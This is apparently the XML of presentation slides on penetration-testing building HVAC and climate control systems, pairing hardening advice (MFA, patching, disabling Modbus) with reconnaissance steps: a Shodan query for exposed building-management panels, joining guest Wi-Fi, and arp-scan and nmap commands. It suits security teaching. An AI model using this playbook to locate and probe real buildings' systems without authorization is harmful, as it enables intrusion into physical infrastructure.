                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Use Multi-Factor Authentication (MFA) where possible.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Image 2" descr="preencoded.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="694373" y="4623078"/>
            <a:ext cx="991910" cy="1529596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1884640" y="4821436"/>
            <a:ext cx="2479953" cy="309920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"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3. Regular Updates</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1950" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1884640" y="5250299"/>
            <a:ext cx="12051387"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51617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Apply firmware and software patches promptly.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1884640" y="5637014"/>
            <a:ext cx="12051387"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51617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Subscribe to CVE feeds for vulnerability notifications.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Image 3" descr="preencoded.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="694373" y="6152674"/>
            <a:ext cx="991910" cy="1529596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1884640" y="6351032"/>
            <a:ext cx="3545086" cy="309920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1950" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Black" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Black" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>4. Disable Unused Features</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1950" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1884640" y="6779895"/>
            <a:ext cx="12051387"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51617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Turn off unnecessary protocols (e.g., Modbus if not in use).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1884640" y="7166610"/>
            <a:ext cx="12051387" cy="317302"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2450"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1550" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Lock down web interfaces and disable remote access when not needed.</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3911084" y="542925"/>
            <a:ext cx="6808232" cy="850940"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="6700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5350" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Black" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Black" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Thank You!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Image 0" descr="preencoded.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4366022" y="1788438"/>
            <a:ext cx="5898237" cy="58982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640086"/>
            <a:ext cx="7159228"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Objective and Layering</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6280190" y="268902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Exploit vulnerabilities in climate control systems.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6280190" y="3131225"/>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Use a layered approach to systematically test security.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6280190" y="3573423"/>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Focus on:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6280190" y="4015621"/>
            <a:ext cx="7556421" cy="362903"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" lvl="2" marL="10287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Software-based exploitation.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6280190" y="4457819"/>
            <a:ext cx="7556421" cy="362903"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" lvl="2" marL="10287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Minimal physical interaction.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6280190" y="4900017"/>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Why a Layered Approach?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6280190" y="5342215"/>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Systematic Testing</a:t>
            </a:r>
            <a:pPr algn="l" lvl="1"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Explore each layer for vulnerabilities.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6280190" y="5784413"/>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Adaptability</a:t>
            </a:r>
            <a:pPr algn="l" lvl="1"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Move to the next step if no exploit is found.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6280190" y="6226612"/>
            <a:ext cx="75564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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Efficiency</a:t>
            </a:r>
            <a:pPr algn="l" lvl="1"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 Focus on exploitable weaknesses.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62683"/>
            <a:ext cx="9355693"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Step 1 – Initial Reconnaissance</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Image 0" descr="preencoded.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="2625090"/>
            <a:ext cx="566976" cy="566976"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="3475553"/>
            <a:ext cx="5709047"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Search for publicly exposed systems.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="3965972"/>
            <a:ext cx="6379607"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This can be done using tools like Shodan. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="4464963"/>
            <a:ext cx="6379607"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Example query:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="5083016"/>
            <a:ext cx="6379607" cy="702945"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1301"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="782479" y="5083016"/>
            <a:ext cx="6402229" cy="702945"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4840"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1009293" y="5253038"/>
            <a:ext cx="5948601"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highlight>
                  <a:srgbClr val="EBDFD7"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>title:"Building Management" OR "HVAC" port:80</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="6041112"/>
            <a:ext cx="6379607"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Investigate login pages, system details, and firmware versions.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Image 1" descr="preencoded.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7456884" y="2625090"/>
            <a:ext cx="566976" cy="566976"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7456884" y="3475553"/>
            <a:ext cx="6379726" cy="708660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="squar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If nothing is publicly exposed (it wont be):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7456884" y="4320302"/>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Connect to guest Wi-Fi or an open Ethernet port.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7456884" y="4819293"/>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Local network scans can be done with commands like:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7456884" y="5437346"/>
            <a:ext cx="6379726" cy="702945"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1301"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7445573" y="5437346"/>
            <a:ext cx="6402348" cy="702945"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4840"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7672388" y="5607368"/>
            <a:ext cx="5948720"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highlight>
                  <a:srgbClr val="EBDFD7"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>sudo arp-scan --interface=wlan0 192.168.0.0/24</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7456884" y="6395442"/>
            <a:ext cx="6379726"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Identify target devices (e.g., HVAC server).</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333857" y="3217426"/>
            <a:ext cx="11962567" cy="978218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="7700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6150" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Black" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Black" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Step 2: Service Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="4649272"/>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022271"/>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2a. Scan the Target Device:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="2779990"/>
            <a:ext cx="7556421" cy="453509"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="3550"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Identify open ports and services:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="3488650"/>
            <a:ext cx="7556421" cy="453509"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="3550"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Can be done with simple commands like:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="4197310"/>
            <a:ext cx="7556421" cy="702945"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1301"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="782479" y="4197310"/>
            <a:ext cx="7579043" cy="702945"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4840"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1009293" y="4367332"/>
            <a:ext cx="7125414"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highlight>
                  <a:srgbClr val="EBDFD7"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>nmap -A -p- 192.168.0.10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="5155406"/>
            <a:ext cx="7556421" cy="453509"/>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Services to look for may include:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="5688211"/>
            <a:ext cx="7556421" cy="453509"/>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HTTP</a:t>
            </a:r>
